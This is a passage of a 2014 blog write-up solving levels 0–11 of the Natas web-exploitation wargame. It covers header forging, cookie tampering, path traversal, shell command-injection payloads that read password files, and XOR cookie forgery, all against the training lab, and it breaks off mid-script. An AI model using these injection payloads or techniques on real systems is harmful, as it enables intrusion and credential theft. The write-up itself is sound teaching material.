exploiting-the-web-in-20-lessons-natas.html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Exploiting the Web in 20 Lessons (Natas)</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Marina von Steinkirch">

    <!-- Le styles -->
    <link rel="stylesheet" href="./theme/css/bootstrap.dark.css" type="text/css" />
    <style type="text/css">
      body {
        padding-top: 60px;
        padding-bottom: 40px;
      }
      .tag-1 {
        font-size: 13pt;
      }
      .tag-2 {
        font-size: 11pt;
      }
      .tag-2 {
        font-size: 10pt;
      }
      .tag-4 {
        font-size: 8pt;
     }
    </style>
    <link href="./theme/css/bootstrap-responsive.dark.css" rel="stylesheet">
    <link href="./theme/css/font-awesome.css" rel="stylesheet">
    <link href="./theme/css/pygments.css" rel="stylesheet">


    <!-- Le fav and touch icons -->
    <link rel="shortcut icon" href="./theme/images/favicon.ico">
    <link rel="apple-touch-icon" href="./theme/images/apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="./theme/images/apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="114x114" href="./theme/images/apple-touch-icon-114x114.png">

    <link href="./feeds/all.atom.xml" type="application/atom+xml" rel="alternate" title="chmod +x singularity.sh ATOM Feed" />

  </head>

  <body>

    <div class="navbar navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container-fluid">
          <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </a>
          <a class="brand" href="./index.html">chmod +x singularity.sh </a>
          <div class="nav-collapse">
            <ul class="nav">
                          <li class="divider-vertical"></li>

                          <ul class="nav pull-right">
                                <li><a href="./authors.html">About</a></li>
                                <li><a href="./archives.html"><b>Archives</b></a></li>
                                <li>
                                  <a href="https://github.com/bt3gl">github
                                  <!--<i class="icon-github-sign icon-large" ></i>-->
                                </a></li>
                                <li>
                                  <a href="https://twitter.com/1bt337">
                                  <!--<i class="icon-twitter-sign icon-large"></i> -->
                                  twitter
                                </a></li>
                                <li><a href="http://bt3gl.github.io/projects_page/index.html">Bygone Playful Times
                                </a></li>
                          </ul>

            </ul>
            <!--<p class="navbar-text pull-right">Logged in as <a href="#">username</a></p>-->
          </div><!--/.nav-collapse -->
        </div>
      </div>
    </div>

    <div class="container-fluid">
      <div class="row">
        <div class="span9" id="content">
<section id="content">
        <article>
                <header>
                        <h1>
                                <a href=""
                                        rel="bookmark"
                                        title="Permalink to Exploiting the Web in 20 Lessons (Natas)">
                                        Exploiting the Web in 20 Lessons (Natas)
                                </a>
                        </h1>
                </header>
                <div class="entry-content">
                <div class="well">
<footer class="post-info">
<abbr class="published" title="2014-10-16T06:01:00">
      Thu 16 October 2014 </abbr>

<span class="label"> Category</span>
<a href="./category/web-security.html"><i class="icon-folder-open"></i>Web Security</a>


<span class="label">Tags</span>
	<a href="./tag/wargames.html"><i class="icon-tag"></i>Wargames</a>
	<a href="./tag/python.html"><i class="icon-tag"></i>Python</a>
	<a href="./tag/burpsuite.html"><i class="icon-tag"></i>BurpSuite</a>
	<a href="./tag/request.html"><i class="icon-tag"></i>request</a>
	<a href="./tag/php.html"><i class="icon-tag"></i>PHP</a>
	<a href="./tag/javascript.html"><i class="icon-tag"></i>JavaScript</a>
	<a href="./tag/sqli.html"><i class="icon-tag"></i>SQLi</a>
	<a href="./tag/command_injection.html"><i class="icon-tag"></i>Command_Injection</a>
	<a href="./tag/mysql.html"><i class="icon-tag"></i>MySQL</a>
	<a href="./tag/xor.html"><i class="icon-tag"></i>XOR</a>
	<a href="./tag/brute_force.html"><i class="icon-tag"></i>Brute_Force</a>
</footer><!-- /.post-info -->                </div>
                <p><img alt="" src="http://i.imgur.com/ihtJsdE.png" /></p>
<p>Continuing my quest through the <a href="http://overthewire.org/wargames/">Wargames</a>, today I am going to talk about the 20 first levels of <a href="http://overthewire.org/wargames/natas/">Natas</a>, the <strong>web exploitation episode</strong>.</p>
<p>I divide the exploits in two parts. The first part contains the easy challenges that don't demand much art (and are a bit boring). The second part comprehends the challenges that do, with scripting, brute force, and all the fun stuff.</p>
<p>Let the game begin.</p>
<hr />
<h2>No scripting required here, Dude!</h2>
<h3>Level 0 and 1: Simple source code inspection</h3>
<p>The first two levels starts with a simple HTML page. No hints.</p>
<p>Obviously, the first thing we do is ti take a look  at the source code.</p>
<p>In the 0th level, the password is straight from the there.</p>
<p>In the first level, we need to  disable  <strong>JavaScript</strong> so you can right click it:</p>
<div class="highlight"><pre><span class="nt">&lt;body</span> <span class="na">oncontextmenu=</span><span class="s">&quot;javascript:alert(&#39;right clicking has been blocked!&#39;);return false;&quot;</span><span class="nt">&gt;</span>
</pre></div>


<p>Too easy.</p>
<h3>Level 2: Source code inspection for directories</h3>
<p>Looking at the source code in the second level reveals:</p>
<div class="highlight"><pre>There is nothing on this page
<span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">&quot;files/pixel.png&quot;</span><span class="nt">&gt;</span>
</pre></div>


<p>Well, this gives us a hint about the folder <strong>files</strong>.</p>
<p>Taking a look at:</p>
<blockquote>
<p>http://natas2.natas.labs.overthewire.org/files/</p>
</blockquote>
<p>gives a file <code>users.txt</code> with the password.</p>
<h3>Level 3: Robots.txt</h3>
<p>Looking at the source code we see this comment:</p>
<div class="highlight"><pre><span class="o">&lt;!--</span> <span class="n">No</span> <span class="n">more</span> <span class="n">information</span> <span class="n">leaks</span><span class="o">!!</span> <span class="n">Not</span> <span class="n">even</span> <span class="n">Google</span> <span class="n">will</span> <span class="n">find</span> <span class="n">it</span> <span class="n">this</span> <span class="n">time</span><span class="p">...</span> <span class="o">--&gt;</span>
</pre></div>


<p>In general, websites use a file called <strong><a href="http://en.wikipedia.org/wiki/Robots_exclusion_standard">robots.txt</a></strong>  to tell search engines what should be indexed.</p>
<p>Looking at:</p>
<blockquote>
<p>http://natas3.natas.labs.overthewire.org/robots.txt</p>
</blockquote>
<p>We find:</p>
<div class="highlight"><pre><span class="n">User</span><span class="o">-</span><span class="n">agent</span><span class="o">:</span> <span class="o">*</span>
<span class="nl">Disallow:</span> <span class="o">/</span><span class="n">s3cr3t</span><span class="o">/</span>
</pre></div>


<p>Looking at the content of  the folder <em>/s3cr3t/</em> revels:</p>
<div class="highlight"><pre><span class="n">Index</span> <span class="n">of</span> <span class="o">/</span><span class="n">s3cr3t</span>

<span class="p">[</span><span class="n">ICO</span><span class="p">]</span>   <span class="n">Name</span>    <span class="n">Last</span> <span class="n">modified</span>   <span class="n">Size</span>    <span class="n">Description</span>
<span class="p">[</span><span class="kt">DIR</span><span class="p">]</span>   <span class="n">Parent</span> <span class="n">Directory</span>        <span class="o">-</span>
<span class="p">[</span><span class="n">TXT</span><span class="p">]</span>   <span class="n">users</span><span class="p">.</span><span class="n">txt</span>   <span class="mi">12</span><span class="o">-</span><span class="n">Jul</span><span class="o">-</span><span class="mi">2013</span> <span class="mi">13</span><span class="o">:</span><span class="mi">35</span>   <span class="mi">40</span>
</pre></div>


<p>Which give us the password file:</p>
<blockquote>
<p>http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt</p>
</blockquote>
<h3>Level 4: Changing the referer tag</h3>
<p>In this level, the front page shows this message:</p>
<div class="highlight"><pre>Access disallowed. You are visiting from &quot;http://natas4.natas.labs.overthewire.org/index.php&quot; while authorized users should come only from &quot;http://natas5.natas.labs.overthewire.org/&quot;
<span class="nt">&lt;br/&gt;</span>
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">&quot;viewsource&quot;</span><span class="nt">&gt;&lt;a</span> <span class="na">href=</span><span class="s">&quot;index.php&quot;</span><span class="nt">&gt;</span>Refresh page<span class="nt">&lt;/a&gt;&lt;/div&gt;</span>
</pre></div>


<p>The server thinks we are coming from a page that is indicated in the <strong><a href="http://en.wikipedia.org/wiki/HTTP_referer">referer</a></strong> tag in the headers.</p>
<p>The referer is a (historically misspelled) tag that carries the address of the URL that linked to the address we are requesting.</p>
<p>There are many ways to tamper this. While we could use browser plugins such as <a href="https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en">tampermonkey</a> or <a href="https://chrome.google.com/webstore/detail/modify-headers-for-google/innpjfdalfhpcoinfnehdnbkglpmogdi?hl=en-US">modify-headers</a>, the good old <strong>curl</strong> do it easily:</p>
<div class="highlight"><pre><span class="nv">$ </span>curl --user natas4:************************ http://natas4.natas.labs.overthewire.org/index.php --referer <span class="s2">&quot;http://natas5.natas.labs.overthewire.org/&quot;</span>
</pre></div>


<h3>Level 5: Tampering cookies</h3>
<p>When we log in the 5th level, the front page says:</p>
<div class="highlight"><pre><span class="n">Access</span> <span class="n">disallowed</span><span class="p">.</span> <span class="n">You</span> <span class="n">are</span> <span class="n">not</span> <span class="n">logged</span> <span class="n">in</span>
</pre></div>


<p>Inspecting the source does not give any additional information.</p>
<p>We check the elements of the page. There is a cookie named <em>loggedin</em> with value <strong>0</strong>. What happens if we change it to <strong>1</strong>?</p>
<p>Using the <a href="http://www.editthiscookie.com/start/">edit this cookie</a> plugin we are able to edit it and get the next password.</p>
<h3>Level 6: Source code inspection for directories II</h3>
<p>This level comes with a PHP form. We take a look at the source code:</p>
<div class="highlight"><pre><span class="cp">&lt;?</span>
<span class="k">include</span> <span class="s2">&quot;includes/secret.inc&quot;</span><span class="p">;</span>

    <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">&quot;submit&quot;</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">if</span><span class="p">(</span><span class="nv">$secret</span> <span class="o">==</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;secret&#39;</span><span class="p">])</span> <span class="p">{</span>
        <span class="k">print</span> <span class="s2">&quot;Access granted. The password for natas7 is &lt;censored&gt;&quot;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">print</span> <span class="s2">&quot;Wrong secret&quot;</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="p">}</span>
<span class="cp">?&gt;</span><span class="x"></span>
<span class="x">&lt;form method=post&gt;</span>
<span class="x">Input secret: &lt;input name=secret&gt;&lt;br&gt;</span>
<span class="x">&lt;input type=submit name=submit&gt;</span>
<span class="x">&lt;/form&gt;</span>
</pre></div>


<p>Double LOL.</p>
<p>We  just need to inspect that first URL to get the value of <em>$secret</em>:</p>
<blockquote>
<p>http://natas6.natas.labs.overthewire.org/includes/secret.inc</p>
</blockquote>
<p>Submitting this value in the input form gives us the password.</p>
<h3>Level 7: Modifying URLs</h3>
<p>This level has the following hint in its PHP source code:</p>
<div class="highlight"><pre><span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">&quot;content&quot;</span><span class="nt">&gt;</span>
<span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">&quot;index.php?page=home&quot;</span><span class="nt">&gt;</span>Home<span class="nt">&lt;/a&gt;</span>
<span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">&quot;index.php?page=about&quot;</span><span class="nt">&gt;</span>About<span class="nt">&lt;/a&gt;</span>
<span class="nt">&lt;br&gt;</span>
<span class="nt">&lt;br&gt;</span>
this is the front page
<span class="c">&lt;!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 --&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></div>


<p>Another easy one.</p>
<p>Instead of <em>page=home</em> we change it to:</p>
<blockquote>
<p>page=/etc/natas_webpass/natas8</p>
</blockquote>
<p>We then get our password at:</p>
<blockquote>
<p>http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8</p>
</blockquote>
<h3>Level 8: String decoding</h3>
<p>This level comes with a PHP form, similar to the 6th level. We take a look at the code source:</p>
<div class="highlight"><pre><span class="cp">&lt;?</span>
<span class="nv">$encodedSecret</span> <span class="o">=</span> <span class="s2">&quot;3d3d516343746d4d6d6c315669563362&quot;</span><span class="p">;</span>
<span class="k">function</span> <span class="nf">encodeSecret</span><span class="p">(</span><span class="nv">$secret</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="nb">bin2hex</span><span class="p">(</span><span class="nb">strrev</span><span class="p">(</span><span class="nb">base64_encode</span><span class="p">(</span><span class="nv">$secret</span><span class="p">)));</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">&quot;submit&quot;</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="nx">encodeSecret</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;secret&#39;</span><span class="p">])</span> <span class="o">==</span> <span class="nv">$encodedSecret</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">print</span> <span class="s2">&quot;Access granted. The password for natas9 is &lt;censored&gt;&quot;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="k">print</span> <span class="s2">&quot;Wrong secret&quot;</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="x"></span>
</pre></div>


<p>Simple. The secret is  encoded in some obscuration. Funny enough, it uses the PHP function <a href="http://php.net/manual/en/function.strrev.php">strrev</a> to reverse the string.</p>
<p>We perform the following operations to recover the variable <em>$secret</em> from the variable <em>$encodedSecret</em>:</p>
<p>I - Decode hexadecimal to binary (<em>bin2hex</em>):</p>
<div class="highlight"><pre><span class="o">&gt;&gt;&gt;</span> <span class="n">SECRET</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">)</span>
<span class="s">&#39;==QcCtmMml1ViV3b&#39;</span>
</pre></div>


<p>II - Reverse the string (<em>strrev</em>):</p>
<div class="highlight"><pre><span class="o">&gt;&gt;&gt;</span> <span class="n">SECRET</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="s">&#39;b3ViV1lmMmtCcQ==&#39;</span>
</pre></div>


<p>III - Base64 decode (<em>base64_encode</em>):</p>
<div class="highlight"><pre><span class="o">&gt;&gt;&gt;</span> <span class="n">SECRET</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;base64&#39;</span><span class="p">)</span>
<span class="s">&#39;oubWYf2kBq&#39;</span>
</pre></div>


<p>We submit this last string in the input form,  giving us the password.</p>
<hr />
<h2>I'm bored. Can we do something actually cool?</h2>
<p>Yes, we can.</p>
<h3>Level 9: OS Command Injection</h3>
<p>This level's page has a search form. If we try to submit a word, for example <em>secret</em>, we get several variations of this word:</p>
<p><img alt="" src="http://i.imgur.com/ZQwlqsQl.png" /></p>
<p>We inspect the source code:</p>
<div class="highlight"><pre><span class="nt">&lt;h1&gt;</span>natas9<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">&quot;content&quot;</span><span class="nt">&gt;</span>
<span class="nt">&lt;form&gt;</span>
Find words containing: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">needle</span><span class="nt">&gt;&lt;input</span> <span class="na">type=</span><span class="s">submit</span> <span class="na">name=</span><span class="s">submit</span> <span class="na">value=</span><span class="s">Search</span><span class="nt">&gt;&lt;br&gt;&lt;br&gt;</span>
<span class="nt">&lt;/form&gt;</span>
Output:
<span class="nt">&lt;pre&gt;</span>
<span class="cp">&lt;?</span>
<span class="cp">$key = &quot;&quot;;</span>
<span class="cp">if(array_key_exists(&quot;needle&quot;, $_REQUEST)) {</span>
<span class="cp">    $key = $_REQUEST[</span><span class="s2">&quot;needle&quot;</span><span class="cp">];</span>
<span class="cp">}</span>
<span class="cp">if($key != &quot;&quot;) {</span>
<span class="cp">    passthru(&quot;grep -i $key dictionary.txt&quot;);</span>
<span class="cp">}</span>
<span class="cp">?&gt;</span>
<span class="nt">&lt;/pre&gt;</span>
</pre></div>


<p>If we try inputs such as *, "", or \n, the query  shows the entire list of words inside the file <em>dictionary.txt</em>. We tried that, but no password there.</p>
<p>Taking a closer look to the code we notice the PHP function <a href="">passthru</a>, which is used to execute an external command.</p>
<p>Since the variable <strong>$key</strong> is <strong>not sanitized</strong>,  we can add a crafted input to it to inject a code that  displays the password at the folder <em>/etc/natas_webpass/natas10</em>. This type of attack is called <a href="https://www.owasp.org/index.php/OS_Command_Injection">OS command injection</a>.</p>
<p>What should we add to the original <em>grep</em> command?</p>
<p>In <strong>Bash</strong>, the <em>semicolon</em> permits putting more than one command on the same line. Adding a <strong>;</strong> to the input allows us to  add a <strong>cat</strong> after that.</p>
<p>The crafted input is:</p>
<div class="highlight"><pre><span class="p">;</span> <span class="n">cat</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">natas_webpass</span><span class="o">/</span><span class="n">natas10</span>
</pre></div>


<p>This gives us the password.</p>
<h3>Level 10: OS Command Injection II</h3>
<p>This level starts with the same search form from the previous level. However, this time we get the warning:</p>
<blockquote>
<p>For security reasons, we now filter on certain characters.</p>
</blockquote>
<p>We take a look at the source code:</p>
<div class="highlight"><pre><span class="x">&lt;pre&gt;</span>
<span class="cp">&lt;?</span>
<span class="nv">$key</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">&quot;needle&quot;</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$key</span> <span class="o">=</span> <span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">&quot;needle&quot;</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$key</span> <span class="o">!=</span> <span class="s2">&quot;&quot;</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">preg_match</span><span class="p">(</span><span class="s1">&#39;/[;|&amp;]/&#39;</span><span class="p">,</span><span class="nv">$key</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">print</span> <span class="s2">&quot;Input contains an illegal character!&quot;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nb">passthru</span><span class="p">(</span><span class="s2">&quot;grep -i </span><span class="si">$key</span><span class="s2"> dictionary.txt&quot;</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="x"></span>
<span class="x">&lt;/pre&gt;</span>
</pre></div>


<p>The difference here is an <em>if</em> clause with the function <a href="http://php.net/manual/en/function.preg-match.php">preg_match</a>. This function is used to search for a pattern in a string, <em>i.e.</em>, it clears the string against the pattern <strong>;</strong>, <strong>|</strong>,  and <strong>&amp;</strong>.</p>
<p>We cannot use the same attack as before with a semicolon!</p>
<p>We need to some other injection that does not need those symbols.</p>
<p>When I was messing around in the previous level I noticed that we can use <strong>""</strong> as an input.  Awesome. The following input reveals the password:</p>
<div class="highlight"><pre><span class="s">&quot;&quot;</span>  <span class="n">cat</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">natas_webpass</span><span class="o">/</span><span class="n">natas11</span>
</pre></div>


<h3>Level 11: Cookies and XOR Encryption</h3>
<p>This level starts with an input form to set a background color and a message:</p>
<blockquote>
<p>cookies are protected with XOR encryption</p>
</blockquote>
<p><img alt="" src="http://i.imgur.com/aD4CKbY.png" /></p>
<p>Let's inspect the source code in several steps. First, we have this suspicious array:</p>
<div class="highlight"><pre><span class="err">$</span><span class="n">defaultdata</span> <span class="o">=</span> <span class="n">array</span><span class="p">(</span> <span class="s">&quot;showpassword&quot;</span><span class="o">=&gt;</span><span class="s">&quot;no&quot;</span><span class="p">,</span> <span class="s">&quot;bgcolor&quot;</span><span class="o">=&gt;</span><span class="s">&quot;#ffffff&quot;</span><span class="p">);</span>
</pre></div>


<p>We will see soon that this array is passed to a cookie as an encrypted XOR string.</p>
<p>What happens if we manage to set <em>showpassword</em> to <em>yes</em>? This is answered in the end of the code:</p>
<div class="highlight"><pre><span class="k">if</span><span class="p">(</span><span class="nv">$data</span><span class="err">[</span><span class="s2">&quot;showpassword&quot;</span><span class="cp">]</span> == &quot;yes&quot;) {
    print &quot;The password for natas12 is <span class="nt">&lt;censored&gt;&lt;br&gt;</span>&quot;;
}
</pre></div>


<p>We know our way now.</p>
<p>We then have this XOR function that take an input value, <em>$text</em>, and XOR to a variable, <em>$key</em>. So we know that XORing the output with what we sent as the input can return the content of <em>$key</em>:</p>
<div class="highlight"><pre><span class="nx">function</span> <span class="nx">xor_encrypt</span><span class="p">(</span><span class="nv">$in</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$key</span> <span class="o">=</span> <span class="s1">&#39;&lt;censored&gt;&#39;</span><span class="p">;</span>
    <span class="nv">$text</span> <span class="o">=</span> <span class="nv">$in</span><span class="p">;</span>
    <span class="nv">$outText</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>

    <span class="c1">// Iterate through each character</span>
    <span class="nb">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o">&lt;</span><span class="nx">strlen</span><span class="p">(</span><span class="nv">$text</span><span class="p">);</span><span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$outText</span> <span class="nx">.</span><span class="o">=</span> <span class="nv">$text</span><span class="err">[</span><span class="nv">$i</span><span class="cp">]</span> ^ $key<span class="cp">[</span><span class="nv">$i</span> <span class="o">%</span> <span class="nx">strlen</span><span class="p">(</span><span class="nv">$key</span><span class="p">)</span><span class="cp">]</span>;
    }
    return $outText;
}
</pre></div>


<p>The rest of the code is only important to show that the string encoded in <em>base64</em> before it's sent to the cookie. The function in the bottom just changes the color of the background:</p>
<div class="highlight"><pre><span class="nx">function</span> <span class="nx">loadData</span><span class="p">(</span><span class="nv">$def</span><span class="p">)</span> <span class="p">{</span>
    <span class="bp">global</span> <span class="nv">$_COOKIE</span><span class="p">;</span>
    <span class="nv">$mydata</span> <span class="o">=</span> <span class="nv">$def</span><span class="p">;</span>
    <span class="k">if</span><span class="p">(</span><span class="nx">array_key_exists</span><span class="p">(</span><span class="s2">&quot;data&quot;</span><span class="p">,</span> <span class="nv">$_COOKIE</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$tempdata</span> <span class="o">=</span> <span class="nx">json_decode</span><span class="p">(</span><span class="nx">xor_encrypt</span><span class="p">(</span><span class="nx">base64_decode</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="err">[</span><span class="s2">&quot;data&quot;</span><span class="cp">]</span>)), true);
    if(is_array($tempdata) <span class="err">&amp;&amp;</span> array_key_exists(&quot;showpassword&quot;, $tempdata) <span class="err">&amp;&amp;</span> array_key_exists(&quot;bgcolor&quot;, $tempdata)) {
        if (preg_match(&#39;/^#(?:<span class="cp">[</span><span class="nx">a</span><span class="na">-f</span><span class="o">\</span><span class="nb">d</span><span class="cp">]</span>{6})$/i&#39;, $tempdata<span class="cp">[</span><span class="s1">&#39;bgcolor&#39;</span><span class="cp">]</span>)) {
        $mydata<span class="cp">[</span><span class="s1">&#39;showpassword&#39;</span><span class="cp">]</span> = $tempdata<span class="cp">[</span><span class="s1">&#39;showpassword&#39;</span><span class="cp">]</span>;
        $mydata<span class="cp">[</span><span class="s1">&#39;bgcolor&#39;</span><span class="cp">]</span> = $tempdata<span class="cp">[</span><span class="s1">&#39;bgcolor&#39;</span><span class="cp">]</span>;
        }
    }
    }
    return $mydata;
}
function saveData($d) {
    setcookie(&quot;data&quot;, base64_encode(xor_encrypt(json_encode($d))));
}
$data = loadData($defaultdata);
if(array_key_exists(&quot;bgcolor&quot;,$_REQUEST)) {
    if (preg_match(&#39;/^#(?:<span class="cp">[</span><span class="nx">a</span><span class="na">-f</span><span class="o">\</span><span class="nb">d</span><span class="cp">]</span>{6})$/i&#39;, $_REQUEST<span class="cp">[</span><span class="s1">&#39;bgcolor&#39;</span><span class="cp">]</span>)) {
        $data<span class="cp">[</span><span class="s1">&#39;bgcolor&#39;</span><span class="cp">]</span> = $_REQUEST<span class="cp">[</span><span class="s1">&#39;bgcolor&#39;</span><span class="cp">]</span>;
    }
}
saveData($data);
<span class="nt">&lt;form&gt;</span>
Background color: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">bgcolor</span> <span class="na">value=</span><span class="s">&quot;</span><span class="cp">&lt;?=</span><span class="nv">$data</span><span class="err">[</span><span class="s1">&#39;bgcolor&#39;</span><span class="err">]</span><span class="cp">?&gt;</span><span class="s">&quot;</span><span class="nt">&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">submit</span> <span class="na">value=</span><span class="s">&quot;Set color&quot;</span><span class="nt">&gt;</span>
<span class="nt">&lt;/form&gt;</span>
</pre></div>


<p>Since we know the plaintext, given by the variable <em>$defaultdata</em>, all we need is the value in the cookie. With that, we can XOR them and get our password.</p>
<p>We can use the plugin I described before, <a href="http://www.editthiscookie.com/start/">edit this cookie</a>, to get this value:</p>
<div class="highlight"><pre><span class="n">ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw</span>
</pre></div>


<p>Now, we write the following script in PHP, modifying the XOR function to take our input:</p>
<div class="highlight"><pre><span class="o">&lt;?</span><span class="nx">php</span>
<span class="nx">$cookie</span> <span class="o">=</span> <span class="nx">base64_decode</span><span class="p">(</span><span class="s1">&#39;ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw&#39;</span><span class="p">);</span>
<span class="kd">function</span> <span class="nx">xor_encrypt</span><span class="p">(</span><span class="nx">$in</span><span class="p">){</span>
    <span class="nx">$text</span> <span class="o">=</span> <span class="nx">$in</span><span class="p">;</span>
    <span class="nx">$key</span> <span class="o">=</span> <span class="nx">json_encode</span><span class="p">(</span><span class="nx">array</span><span class="p">(</span> <span class="s2">&quot;showpassword&quot;</span><span class="o">=&gt;</span><span class="s2">&quot;no&quot;</span><span class="p">,</span> <span class="s2">&quot;bgcolor&quot;</span><span class="o">=&gt;</span><span class="s2">&quot;#ffffff&quot;</span><span class="p">));</span>
    <span class="nx">$outText</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>

    <span class="k">for</span><span class="p">(</span><span class="nx">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nx">$i</span><span class="o">&lt;</span><span class="nx">strlen</span><span class="p">(</span><span class="nx">$text</span><span class="p">);</span><span class="nx">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">$outText</span> <span class="p">.</span><span class="o">=</span> <span class="nx">$text</span><span class="cp">[</span><span class="nv">$i</span><span class="cp">]</span> <span class="o">^</span> <span class="nx">$key</span><span class="cp">[</span><span class="nv">$i</span> <span class="o">%</span> <span class="nx">strlen</span><span class="p">(</span><span class="nv">$key</span><span class="p">)</span><span class="cp">]</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="nx">$outText</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">print</span> <span class="nx">xor_encrypt</span><span class="p">(</span><span class="nx">$cookie</span><span class="p">);</span>
<span class="o">?&gt;</span>
</pre></div>


<p>Running it returns the XOR key that encrypts the <em>$defaultdata</em> variable:</p>
<div class="highlight"><pre><span class="nv">$ </span>php xor.php
qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
</pre></div>


<p>The repeated pattern is obviously a key.</p>
<p>The next step is to modify the value of that variable to have <em>showpassword</em> saying <em>yes</em>. Then this should be XORerd with the right key in <em>$key</em>.</p>
<p>For that, we created the following script:</p>
<div class="highlight"><pre><span class="o">&lt;?</span><span class="nx">php</span>
<span class="kd">function</span> <span class="nx">xor_encrypt_mod</span><span class="p">(){</span>
    <span class="nx">$text</span> <span class="o">=</span> <span class="nx">json_encode</span><span class="p">(</span><span class="nx">array</span><span class="p">(</span> <span class="s2">&quot;showpassword&quot;</span><span class="o">=&gt;</span><span class="s2">&quot;yes&quot;</span><span class="p">,</span> <span class="s2">&quot;bgcolor&quot;</span><span class="o">=&gt;</span><span class="s2">&quot;#ffffff&quot;</span><span class="p">));</span>
    <span class="nx">$key</span> <span class="o">=</span> <span class="s1">&#39;qw8J&#39;</span><span class="p">;</span>
    <span class="nx">$outText</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>

    <span class="k">for</span><span class="p">(</span><span class="nx">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nx">$i</span><span class="o">&lt;</span><span class="nx">strlen</span><span class="p">(</span><span class="nx">$text</span><span class="p">);</span><span class="nx">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">$outText</span> <span class="p">.</span><span class="o">=</span> <span class="nx">$text</span><span class="cp">[</span><span class="nv">$i</span><span class="cp">]</span> <span class="o">^</span> <span class="nx">$key</span><span class="cp">[</span><span class="nv">$i</span> <span class="o">%</span> <span class="nx">strlen</span><span class="p">(</span><span class="nv">$key</span><span class="p">)</span><span class="cp">]</span><span class="p">;</span>
    <span class="p">}</span>
